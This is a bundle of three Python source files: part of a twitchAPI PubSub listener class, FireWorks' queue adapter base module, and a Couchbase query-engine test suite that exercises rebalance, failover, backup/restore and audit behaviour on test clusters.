Requires the :const:`twitchAPI.types.AuthScope.CHANNEL_READ_REDEMPTIONS` AuthScope.\n
:param str channel_id: ID of the Channel
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:return: UUID of this subscription
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something other than expected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
:raises ~twitchAPI.types.MissingScopeException: if required AuthScope is missing from Token
"""
return self.__generic_listen(f'channel-points-channel-v1.{channel_id}',
callback_func,
[AuthScope.CHANNEL_READ_REDEMPTIONS])
def listen_channel_subscriptions(self,
channel_id: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
You are notified when anyone subscribes (first month), resubscribes (subsequent months),
or gifts a subscription to a channel. Subgift subscription messages contain recipient information.\n
Requires the :const:`twitchAPI.types.AuthScope.CHANNEL_READ_SUBSCRIPTIONS` AuthScope.\n
:param str channel_id: ID of the Channel
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:return: UUID of this subscription
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something other than expected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
:raises ~twitchAPI.types.MissingScopeException: if required AuthScope is missing from Token
"""
return self.__generic_listen(f'channel-subscribe-events-v1.{channel_id}',
callback_func,
[AuthScope.CHANNEL_READ_SUBSCRIPTIONS])
def listen_chat_moderator_actions(self,
user_id: str,
channel_id: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
Supports moderators listening to the topic, as well as users listening to the topic to receive their own events.
Examples of moderator actions are bans, unbans, timeouts, deleting messages,
changing chat mode (followers-only, subs-only), changing AutoMod levels, and adding a mod.\n
Requires the :const:`twitchAPI.types.AuthScope.CHANNEL_MODERATE` AuthScope.\n
:param str user_id: ID of the User
:param str channel_id: ID of the Channel
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:return: UUID of this subscription
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something other than expected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
:raises ~twitchAPI.types.MissingScopeException: if required AuthScope is missing from Token
"""
return self.__generic_listen(f'chat_moderator_actions.{user_id}.{channel_id}',
callback_func,
[AuthScope.CHANNEL_MODERATE])
def listen_automod_queue(self,
moderator_id: str,
channel_id: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
You are notified when AutoMod flags a message as potentially inappropriate, and when a moderator takes action on that message.\n
Requires the :const:`twitchAPI.types.AuthScope.CHANNEL_MODERATE` AuthScope.\n
:param str moderator_id: ID of the Moderator
:param str channel_id: ID of the Channel
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:return: UUID of this subscription
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something other than expected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
:raises ~twitchAPI.types.MissingScopeException: if required AuthScope is missing from Token
"""
return self.__generic_listen(f'automod-queue.{moderator_id}.{channel_id}',
callback_func,
[AuthScope.CHANNEL_MODERATE])
def listen_user_moderation_notifications(self,
user_id: str,
channel_id: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
You are notified when a user’s message held by AutoMod has been approved or denied.\n
Requires the :const:`twitchAPI.types.AuthScope.CHAT_READ` AuthScope.\n
:param str user_id: ID of the User
:param str channel_id: ID of the Channel
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:return: UUID of this subscription
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something other than expected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
:raises ~twitchAPI.types.MissingScopeException: if required AuthScope is missing from Token
"""
return self.__generic_listen(f'user-moderation-notifications.{user_id}.{channel_id}',
callback_func,
[AuthScope.CHAT_READ])
def listen_undocumented_topic(self,
topic: str,
callback_func: Callable[[UUID, dict], None]) -> UUID:
"""
Listen to one of the many undocumented PubSub topics.
Make sure that you have the required AuthScope for your topic set, since this library cannot check it for you!
.. warning:: Using an undocumented topic can break at any time; use at your own risk!
:param str topic: the topic string
:param Callable[[~uuid.UUID,dict],None] callback_func: Function called on event
:rtype: ~uuid.UUID
:raises ~twitchAPI.types.TwitchAuthorizationException: if Token is not valid or does not have the required AuthScope
:raises ~twitchAPI.types.TwitchBackendException: if the Twitch Server has a problem
:raises ~twitchAPI.types.TwitchAPIException: if the subscription response is something other than expected
:raises ~twitchAPI.types.PubSubListenTimeoutException: if the subscription is not confirmed in the time set by
`listen_confirm_timeout`
"""
self.__logger.warning(f"using undocumented topic {topic}")
return self.__generic_listen(topic, callback_func, [])
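# --- Usage sketch (editor's illustration, not part of the library) ----------
# A minimal, hedged example of wiring up one of the listen_* methods above. It
# assumes an authenticated `twitch` client whose token carries the
# CHANNEL_READ_REDEMPTIONS scope, and that this class also exposes start(),
# stop() and an unlisten(uuid) method (the unsubscribe logic shown at the top
# of this section); `channel_id` is a placeholder, not a value defined here.
def _example_channel_points_listener(twitch, channel_id: str) -> None:
    def on_redemption(sub_uuid: UUID, data: dict) -> None:
        # `data` carries the raw PubSub payload for the redemption event
        print(sub_uuid, data)

    pubsub = PubSub(twitch)  # hypothetical name for the surrounding class
    pubsub.start()
    listen_id = pubsub.listen_channel_points(channel_id, on_redemption)
    # ... run until done, then clean up the subscription
    pubsub.unlisten(listen_id)
    pubsub.stop()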
|
queue_adapter.py
|
# coding: utf-8
"""
This module contains contracts for defining adapters to various queueing systems, e.g. PBS/SLURM/SGE.
"""
from __future__ import unicode_literals
import os
import shlex
import string
import subprocess
import threading
import traceback
import abc
import collections
import six
from fireworks.utilities.fw_serializers import FWSerializable, serialize_fw
from fireworks.utilities.fw_utilities import get_fw_logger
__author__ = 'Anubhav Jain'
__credits__ = 'Shyue Ping Ong'
__copyright__ = 'Copyright 2013, The Materials Project'
__version__ = '0.1'
__maintainer__ = 'Anubhav Jain'
__email__ = 'ajain@lbl.gov'
__date__ = 'Feb 28, 2013'
class Command(object):
"""
Helper class - run subprocess commands in a different thread with TIMEOUT option.
From https://gist.github.com/kirpit/1306188
Based on jcollado's solution:
http://stackoverflow.com/questions/1191374/subprocess-with-timeout/4825933#4825933
"""
command = None
process = None
status = None
output, error = '', ''
def __init__(self, command):
"""
initialize the object.
Args:
command: command to run
"""
if isinstance(command, six.string_types):
command = shlex.split(command)
self.command = command
def run(self, timeout=None, **kwargs):
"""
Run the command.
Args:
timeout (float): timeout
kwargs (dict)
Returns:
(status, output, error)
"""
def target(**kwargs):
try:
self.process = subprocess.Popen(self.command, **kwargs)
self.output, self.error = self.process.communicate()
self.status = self.process.returncode
# Python 3 - decode bytes output to str
if isinstance(self.output, bytes):
self.output = self.output.decode("utf-8")
if isinstance(self.error, bytes):
self.error = self.error.decode("utf-8")
except:
self.error = traceback.format_exc()
self.status = -1
# default stdout and stderr
if 'stdout' not in kwargs:
kwargs['stdout'] = subprocess.PIPE
if 'stderr' not in kwargs:
kwargs['stderr'] = subprocess.PIPE
# thread
thread = threading.Thread(target=target, kwargs=kwargs)
thread.start()
thread.join(timeout)
if thread.is_alive():
self.process.terminate()
thread.join()
return self.status, self.output, self.error
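# --- Usage sketch (editor's illustration) ------------------------------------
# Command wraps subprocess.Popen in a worker thread so that a hung queue
# command cannot block forever: run() joins the thread for `timeout` seconds
# and terminates the child process if it is still alive. A minimal example,
# assuming a POSIX environment with a `sleep` binary:
def _example_command_timeout():
    status, output, error = Command('sleep 30').run(timeout=2)
    # The child is terminated after ~2 s; status is its return code
    # (negative on a signal, -1 if the worker thread raised).
    return status, output, error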
class QueueAdapterBase(collections.defaultdict, FWSerializable):
"""
The QueueAdapter is responsible for all interactions with a specific queue management system.
This includes handling all details of queue script format as well as queue submission and
management.
A user should extend this class with implementations that work on specific queue systems.
Examples and implementations are in: fireworks/user_objects/queue_adapters.
Documentation on implementing queue adapters can be found on the FireWorks home page,
http://fireworks.readthedocs.io/en/latest
"""
_fw_name = 'QueueAdapterBase'
template_file = 'OVERRIDE_ME' # path to template file for a queue script
submit_cmd = 'OVERRIDE_ME'  # command to submit jobs, e.g. "qsub" or "sbatch"
q_name = 'OVERRIDE_ME' # (arbitrary) name, e.g. "pbs" or "slurm"
defaults = {} # default parameter values for template
def get_script_str(self, launch_dir):
"""
Returns a (multi-line) string representing the queue script, e.g. a PBS script.
Uses the template_file along with internal parameters to create the script.
Args:
launch_dir (str): The directory the job will be launched in
Returns:
(str) the queue script
"""
with open(self.template_file) as f:
a = QScriptTemplate(f.read())
# set substitution dict for replacements into the template
subs_dict = {k: v for k, v in self.items()
if v is not None} # clean null values
for k, v in self.defaults.items():
subs_dict.setdefault(k, v)
subs_dict['job_name'] = subs_dict.get('job_name', 'FW_job')
launch_dir = os.path.abspath(launch_dir)
subs_dict['launch_dir'] = launch_dir
# might contain unused parameters as leftover $$
unclean_template = a.safe_substitute(subs_dict)
clean_template = filter(lambda l: "$$" not in l,
unclean_template.split('\n'))
return '\n'.join(clean_template)
@abc.abstractmethod
def submit_to_queue(self, script_file):
"""
Submits the job to the queue and returns the job id.
Args:
script_file: (str) name of the script file to use (String)
Returns:
(int) job_id
"""
pass
@abc.abstractmethod
def get_njobs_in_queue(self, username=None):
"""
Returns the number of jobs currently in the queue for the user.
Args:
username (str): the username of the jobs to count (default is to autodetect)
Returns:
(int) number of jobs in the queue
"""
pass
@serialize_fw
def to_dict(self):
return dict(self)
@classmethod
def from_dict(cls, m_dict):
return cls(m_dict)
def get_qlogger(self, name):
if 'logdir' in self:
return get_fw_logger(name, self['logdir'])
else:
return get_fw_logger(name, stream_level='CRITICAL')
class QScriptTemplate(string.Template):
delimiter = '$$'
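# --- Implementation sketch (editor's illustration) ---------------------------
# How the pieces above fit together: a concrete adapter points template_file at
# a script whose placeholders use the `$$` delimiter of QScriptTemplate; then
# get_script_str() substitutes them and drops any line whose placeholder was
# left unset. A minimal, hypothetical PBS-flavoured subclass (not one of the
# bundled fireworks/user_objects/queue_adapters implementations) could look
# like this:
class _ExamplePBSAdapter(QueueAdapterBase):
    _fw_name = 'ExamplePBSAdapter'
    template_file = '/path/to/pbs_template.txt'  # e.g. contains "#PBS -N $$job_name"
    submit_cmd = 'qsub'
    q_name = 'example_pbs'
    defaults = {'walltime': '01:00:00'}

    def submit_to_queue(self, script_file):
        # qsub conventionally prints the job id ("12345.hostname") on stdout;
        # the exact format is site-specific, so treat this parsing as a sketch.
        status, output, error = Command([self.submit_cmd, script_file]).run(timeout=60)
        if status != 0:
            raise RuntimeError('qsub failed: {}'.format(error))
        return int(output.split('.')[0])

    def get_njobs_in_queue(self, username=None):
        username = username or os.environ.get('USER', '')
        status, output, error = Command(['qstat', '-u', username]).run(timeout=60)
        if status != 0:
            return 0
        # qstat prints a site-dependent header; counting non-empty lines beyond
        # it is only a rough approximation.
        return max(len([l for l in output.split('\n') if l.strip()]) - 5, 0)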
|
tuq_cluster_ops.py
|
import time
import threading
import json
from security.auditmain import audit
from tuqquery.tuq_join import JoinTests
from remote.remote_util import RemoteMachineShellConnection
from membase.api.rest_client import RestConnection
from membase.helper.cluster_helper import ClusterOperationHelper
from backuptests import BackupHelper
from tuq_sanity import QuerySanityTests
class QueriesOpsTests(QuerySanityTests):
def setUp(self):
self.cluster_ops=True
super(QueriesOpsTests, self).setUp()
self.setup_query_nodes = self.input.param("setup_query_nodes", False)
self.query_params = {'scan_consistency' : 'statement_plus'}
if self.nodes_init > 1 and not self._testMethodName == 'suite_setUp':
if self.setup_query_nodes:
self.cluster.rebalance(self.servers[:1], self.servers[1:self.nodes_init], [], services=['n1ql'])
else:
self.cluster.rebalance(self.servers[:1], self.servers[1:self.nodes_init], [])
self.indx_type = self.input.param("indx_type", 'GSI')
self.stop_server = self.input.param("stop_server", False)
self.stop_source = self.input.param("stop_source", False)
self.network_partition = self.input.param("network_partition", False)
self.rebalance_index = self.input.param("rebalance_index", False)
self.rebalance_n1ql = self.input.param("rebalance_n1ql", False)
self.retry_time = self.input.param("retry_time", 300)
self.rebalance_out = self.input.param("rebalance_out", False)
self.num_retries = self.input.param("num_retries", 1)
self.fail = False
self.sleep_time = self.input.param("sleep_time", 10)
def suite_setUp(self):
super(QueriesOpsTests, self).suite_setUp()
def tearDown(self):
rest = RestConnection(self.master)
if rest._rebalance_progress_status() == 'running':
self.log.warning("rebalancing is still running, test should be verified")
stopped = rest.stop_rebalance()
self.assertTrue(stopped, msg="unable to stop rebalance")
try:
super(QueriesOpsTests, self).tearDown()
except:
pass
try:
ClusterOperationHelper.cleanup_cluster(self.servers, master=self.master)
self.sleep(1)
except:
for server in set(self.servers) - set([self.master]):
try:
rest = RestConnection(server)
rest.force_eject_node()
time.sleep(1)
except BaseException, e:
self.fail(e)
def suite_tearDown(self):
super(QueriesOpsTests, self).suite_tearDown()
def test_incr_rebalance_in(self):
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
index_field = self.input.param("index_field", 'job_title')
indexes = []
try:
indexes = self._create_multiple_indexes(index_field)
self.test_min()
for i in xrange(1, self.nodes_in + 1):
rebalance = self.cluster.async_rebalance(self.servers[:i],
self.servers[i:i + 1], [])
self.test_min()
rebalance.result()
self.test_min()
finally:
self._delete_multiple_indexes(indexes)
def test_incr_rebalance_out(self):
self.assertTrue(len(self.servers[:self.nodes_init]) > self.nodes_out,
"Servers are not enough")
index_field = self.input.param("index_field", 'job_title')
indexes = []
try:
indexes = self._create_multiple_indexes(index_field)
self.test_min()
for i in xrange(1, self.nodes_out + 1):
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init - (i - 1)],
[],
self.servers[self.nodes_init - i:self.nodes_init - (i - 1)])
self.test_min()
rebalance.result()
self.test_min()
finally:
self._delete_multiple_indexes(indexes)
def test_swap_rebalance(self):
self.assertTrue(len(self.servers) >= self.nodes_init + self.nodes_in,
"Servers are not enough")
index_field = self.input.param("index_field", 'name')
indexes = []
try:
indexes = self._create_multiple_indexes(index_field)
self.test_array_append()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.servers[self.nodes_init:self.nodes_init + self.nodes_in],
self.servers[self.nodes_init - self.nodes_out:self.nodes_init])
self.test_array_append()
rebalance.result()
self.test_array_append()
finally:
self._delete_multiple_indexes(indexes)
def test_rebalance_with_server_crash(self):
servr_in = self.servers[self.nodes_init:self.nodes_init + self.nodes_in]
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
self.test_case()
for i in xrange(3):
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
servr_in, servr_out)
self.sleep(5, "Wait some time for rebalance process and then kill memcached")
remote = RemoteMachineShellConnection(self.servers[self.nodes_init - 1])
remote.terminate_process(process_name='memcached')
self.test_case()
try:
rebalance.result()
except:
pass
self.cluster.rebalance(self.servers[:self.nodes_init], servr_in, servr_out)
self.test_case()
def test_failover(self):
index_field = self.input.param("index_field", 'name')
indexes = []
try:
indexes = self._create_multiple_indexes(index_field)
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
self.test_union()
self.cluster.failover(self.servers[:self.nodes_init], servr_out)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], servr_out)
self.test_union()
rebalance.result()
self.test_union()
finally:
self._delete_multiple_indexes(indexes)
def test_failover_add_back(self):
index_field = self.input.param("index_field", 'name')
indexes = []
try:
indexes = self._create_multiple_indexes(index_field)
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
self.test_union()
nodes_all = RestConnection(self.master).node_statuses()
nodes = []
for failover_node in servr_out:
nodes.extend([node for node in nodes_all
if node.ip == failover_node.ip and str(node.port) == failover_node.port])
self.cluster.failover(self.servers[:self.nodes_init], servr_out)
for node in nodes:
RestConnection(self.master).add_back_node(node.id)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
self.test_union()
rebalance.result()
self.test_union()
finally:
self._delete_multiple_indexes(indexes)
def test_autofailover(self):
autofailover_timeout = 30
status = RestConnection(self.master).update_autofailover_settings(True, autofailover_timeout)
self.assertTrue(status, 'failed to change autofailover_settings!')
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
self.test_union()
remote = RemoteMachineShellConnection(self.servers[self.nodes_init - 1])
try:
remote.stop_server()
self.sleep(autofailover_timeout + 10, "Wait for autofailover")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], servr_out)
self.test_union()
rebalance.result()
self.test_union()
finally:
remote.start_server()
def test_cancel_query_mb_9223(self):
for bucket in self.buckets:
self.query = 'SELECT tasks_points.task1 AS points FROM %s AS test ' % (bucket.name) + \
'GROUP BY test.tasks_points.task1 ORDER BY points'
self.log.info("run query to cancel")
try:
RestConnection(self.master).query_tool(self.query, timeout=5)
except:
self.log.info("query is cancelled")
full_list = self.generate_full_docs_list(self.gens_load)
expected_result = [{"points" : doc["tasks_points"]["task1"]} for doc in full_list]
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
expected_result = sorted(expected_result, key=lambda doc: doc['points'])
actual_result = self.run_cbq_query()
self._verify_results(actual_result['results'], expected_result)
def test_failover_with_server_crash(self):
servr_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
self.test_union()
self.cluster.failover(self.servers[:self.nodes_init], servr_out)
for i in xrange(3):
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], servr_out)
self.sleep(5, "Wait some time for rebalance process and then kill memcached")
self.shell.terminate_process(process_name='memcached')
self.test_union()
try:
rebalance.result()
except:
pass
rebalance = self.cluster.rebalance(self.servers[:self.nodes_init],
[], servr_out)
self.test_union()
def test_warmup(self):
index_field = self.input.param("index_field", 'name')
indexes = []
try:
indexes = self._create_multiple_indexes(index_field)
num_srv_warm_up = self.input.param("srv_warm_up", 1)
if self.input.tuq_client is None:
self.fail("For this test external tuq server is requiered. " + \
"Please specify one in conf")
self.test_union_all()
for server in self.servers[self.nodes_init - num_srv_warm_up:self.nodes_init]:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
remote.start_server()
remote.disconnect()
#run query, result may not be as expected, but tuq shouldn't fail
try:
self.test_union_all()
except:
pass
ClusterOperationHelper.wait_for_ns_servers_or_assert(self.servers, self, wait_if_warmup=True)
self.verify_cluster_stats(self.servers[:self.nodes_init])
self.sleep(50)
self.verify_cluster_stats(self.servers[:self.nodes_init])
self.test_union_all()
finally:
self._delete_multiple_indexes(indexes)
def test_with_backup(self):
tmp_folder = "/tmp/backup"
try:
self.shell.create_directory(tmp_folder)
node = RestConnection(self.master).get_nodes_self()
self.is_membase = False
BackupHelper(self.master, self).backup('default', node, tmp_folder)
self.verify_cluster_stats(self.servers[:self.nodes_init])
self.test_union_all()
finally:
self.shell.delete_files(tmp_folder)
def test_queries_after_backup_restore(self):
method_name = self.input.param('to_run', 'test_any')
self.couchbase_login_info = "%s:%s" % (self.input.membase_settings.rest_username,
self.input.membase_settings.rest_password)
self.backup_location = self.input.param("backup_location", "/tmp/backup")
self.command_options = self.input.param("command_options", '')
shell = RemoteMachineShellConnection(self.master)
fn = getattr(self, method_name)
fn()
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, self.command_options)
fn = getattr(self, method_name)
fn()
for bucket in self.buckets:
self.cluster.bucket_flush(self.master, bucket=bucket)
self.sleep(5, 'wait some time before restore')
shell.restore_backupFile(self.couchbase_login_info, self.backup_location, [bucket.name for bucket in self.buckets])
fn = getattr(self, method_name)
fn()
def test_queries_after_backup_with_view(self):
index_name = "Automation_backup_index"
method_name = self.input.param('to_run', 'test_any')
self.couchbase_login_info = "%s:%s" % (self.input.membase_settings.rest_username,
self.input.membase_settings.rest_password)
self.backup_location = self.input.param("backup_location", "/tmp/backup")
self.command_options = self.input.param("command_options", '')
index_field = self.input.param("index_field", '')
self.assertTrue(index_field, "Index field should be provided")
for bucket in self.buckets:
self.run_cbq_query(query="CREATE INDEX %s ON %s(%s)" % (index_name, bucket.name, ','.join(index_field.split(';'))))
try:
shell = RemoteMachineShellConnection(self.master)
fn = getattr(self, method_name)
fn()
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, self.command_options)
fn = getattr(self, method_name)
fn()
for bucket in self.buckets:
self.cluster.bucket_flush(self.master, bucket=bucket)
self.sleep(5, 'wait some time before restore')
shell.restore_backupFile(self.couchbase_login_info, self.backup_location, [bucket.name for bucket in self.buckets])
fn = getattr(self, method_name)
fn()
finally:
for bucket in self.buckets:
self.run_cbq_query(query="DROP INDEX %s.%s" % (bucket.name, index_name))
def test_queries_after_backup_with_2i(self):
index_name = "Automation_backup_index"
method_name = self.input.param('to_run', 'test_any')
self.couchbase_login_info = "%s:%s" % (self.input.membase_settings.rest_username,
self.input.membase_settings.rest_password)
self.backup_location = self.input.param("backup_location", "/tmp/backup")
self.command_options = self.input.param("command_options", '')
index_field = self.input.param("index_field", '')
self.assertTrue(index_field, "Index field should be provided")
for bucket in self.buckets:
query = "CREATE INDEX %s ON %s(%s) USING GSI" % (index_name, bucket.name, ','.join(index_field.split(';')))
# if self.gsi_type:
# query += " WITH {'index_type': 'memdb'}"
self.run_cbq_query(query=query)
try:
shell = RemoteMachineShellConnection(self.master)
fn = getattr(self, method_name)
fn()
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, self.command_options)
fn = getattr(self, method_name)
fn()
for bucket in self.buckets:
self.cluster.bucket_flush(self.master, bucket=bucket)
self.sleep(5, 'wait some time before restore')
shell.restore_backupFile(self.couchbase_login_info, self.backup_location, [bucket.name for bucket in self.buckets])
fn = getattr(self, method_name)
fn()
finally:
for bucket in self.buckets:
self.run_cbq_query(query="DROP INDEX %s.%s" % (bucket.name, index_name))
def test_audit_add_node(self):
eventID = 8196 #add node
server = self.master
if self.input.tuq_client and "client" in self.input.tuq_client:
server = self.input.tuq_client["client"]
index_field = self.input.param("index_field", 'job_title')
indexes = []
try:
audit_reb_in = audit(eventID=eventID, host=server)
indexes = self._create_multiple_indexes(index_field)
servers_in = self.servers[1:self.nodes_in]
rebalance = self.cluster.async_rebalance(self.servers[:1],
servers_in, [], services=self.services_in)
expected_result = {"services": self.services_in, 'port':8091, 'hostname': servers_in[0].ip, 'groupUUID':"0",
'node':'ns_1@' + servers_in[0].ip, 'source':'ns_server', 'user': self.master.rest_username,
"ip": self.getLocalIPAddress(), "port": 57457}
self.test_min()
audit_reb_in.checkConfig(expected_result)
rebalance.result()
finally:
for bucket in self.buckets:
for index_name in set(indexes):
self.run_cbq_query(query="DROP INDEX %s.%s" % (bucket.name, index_name))
def test_audit_rm_node(self):
eventID = 8197 #remove node
server = self.master
if self.input.tuq_client and "client" in self.input.tuq_client:
server = self.input.tuq_client["client"]
index_field = self.input.param("index_field", 'job_title')
indexes = []
try:
audit_reb_out = audit(eventID=eventID, host=server)
indexes = self._create_multiple_indexes(index_field)
servers_in = self.servers[1:self.nodes_in]
self.cluster.rebalance(self.servers[:1], servers_in, [], services=self.services_in)
rebalance = self.cluster.rebalance(self.servers[:1], [], servers_in)
expected_result = {"services": self.services_in, 'port':8091, 'hostname': servers_in[0].ip, 'groupUUID':"0",
'node':'ns_1@' + servers_in[0].ip, 'source':'ns_server', 'user': self.master.rest_username,
"ip": self.getLocalIPAddress(), "port": 57457}
self.test_min()
audit_reb_out.checkConfig(expected_result)
rebalance.result()
finally:
for bucket in self.buckets:
for index_name in set(indexes):
self.run_cbq_query(query="DROP INDEX %s.%s" % (bucket.name, index_name))
def test_rebalance_in_stop_node(self):
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.servers[1:(self.nodes_init + 1)], self.servers[:1], services=['kv,index'])
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[1:self.nodes_init+1],
self.servers[:1], [], services=['n1ql'])
rebalance.result()
try:
thread1 = threading.Thread(name='run_query', target=self.run_queries_until_timeout)
thread1.start()
if self.stop_source:
remote = RemoteMachineShellConnection(self.servers[0])
remote.stop_server()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init+1],
self.servers[2:(self.nodes_init + 2)], [],services=['n1ql'])
rebalance.result()
if self.stop_server:
remote = RemoteMachineShellConnection(self.servers[2])
remote.stop_server()
elif self.network_partition:
self.start_firewall_on_node(self.servers[2])
self.sleep(10)
else:
self.cluster.failover(self.servers[:self.nodes_init+2], self.servers[2:self.nodes_init+2])
thread1.join()
self.assertFalse(self.fail, "Queries did not recover")
except Exception as e:
self.log.error(str(e))
finally:
if self.stop_source or self.stop_server:
remote.start_server()
elif self.network_partition:
self.stop_firewall_on_node(self.servers[(self.nodes_init)])
self.sleep(300)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init+1],
[], [self.servers[0]])
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[1:self.nodes_init+1],
[self.servers[0]], [], services =['kv,n1ql,index'])
rebalance.result()
def test_rebalance_in_failure(self):
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
try:
thread1 = threading.Thread(name='run_query', target=self.run_queries_until_timeout)
thread1.start()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.servers[1:(self.nodes_init + 1)], [],services=['n1ql'])
time.sleep(1)
self.start_firewall_on_node(self.servers[(self.nodes_init)])
self.sleep(120)
thread1.join()
self.assertFalse(self.fail, "Queries did not recover")
except Exception as e:
self.log.error(str(e))
finally:
self.stop_firewall_on_node(self.servers[(self.nodes_init)])
self.sleep(300)
def test_rebalance_failure_retry(self):
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
body = {"enabled": "true", "afterTimePeriod": self.retry_time , "maxAttempts" : self.num_retries}
rest = RestConnection(self.master)
rest.set_retry_rebalance_settings(body)
result = rest.get_retry_rebalance_settings()
if self.rebalance_out:
rebalance_server = self.servers[(self.nodes_init-1)]
else:
rebalance_server = self.servers[(self.nodes_init)]
self.log.info("Retry Rebalance settings changed to : {0}"
.format(json.loads(result)))
try:
if self.rebalance_out:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [self.servers[self.nodes_init - 1]])
else:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.servers[1:(self.nodes_init + 1)], [],services=['n1ql'])
time.sleep(1)
self.start_firewall_on_node(rebalance_server)
rebalance.result()
self.fail("Rebalance did not fail")
except Exception as e:
self.log.error(str(e))
if self.num_retries > 1:
time.sleep(self.retry_time + 30)
self.stop_firewall_on_node(rebalance_server)
time.sleep(10)
self.check_retry_rebalance_succeeded()
finally:
self.stop_firewall_on_node(rebalance_server)
body = {"enabled": "false"}
rest.set_retry_rebalance_settings(body)
self.sleep(60)
def test_rebalance_out_query_node(self):
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
try:
thread1 = threading.Thread(name='run_query', target=self.run_queries_until_timeout)
thread1.start()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [self.servers[self.nodes_init-1]])
rebalance.result()
if self.stop_server:
output, error = self.shell.execute_command("killall -9 cbq-engine")
thread1.join()
self.assertFalse(self.fail, "Queries failed")
except Exception as e:
self.log.error(str(e))
def test_swap_rebalance_nodes(self):
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.servers[self.nodes_init:self.nodes_init + 1],
[],services=["kv"])
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:(self.nodes_init+1)],
self.servers[self.nodes_init+1:self.nodes_init + 2],
self.servers[:1],services=["index"])
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[1:(self.nodes_init+3)],
self.servers[self.nodes_init+2:self.nodes_init + 3],
[],services=["n1ql"])
rebalance.result()
try:
thread1 = threading.Thread(name='run_query', target=self.run_queries_until_timeout)
thread1.start()
if self.rebalance_index:
rebalance = self.cluster.async_rebalance(self.servers[1:self.nodes_init+3],
self.servers[:1],
self.servers[self.nodes_init+1:self.nodes_init+2], services=["kv,n1ql,index"])
elif self.rebalance_n1ql:
rebalance = self.cluster.async_rebalance(self.servers[1:self.nodes_init+3],
self.servers[:1],
self.servers[self.nodes_init+2:self.nodes_init+3], services=["kv,n1ql,index"])
else:
rebalance = self.cluster.async_rebalance(self.servers[1:self.nodes_init+3],
self.servers[:1],
self.servers[self.nodes_init:self.nodes_init+1], services=["kv,n1ql,index"])
rebalance.result()
thread1.join()
self.assertFalse(self.fail, "Queries failed")
except Exception as e:
self.log.error(str(e))
def test_swap_rebalance_kv_n1ql_index(self):
self.assertTrue(len(self.servers) >= self.nodes_in + 1, "Servers are not enough")
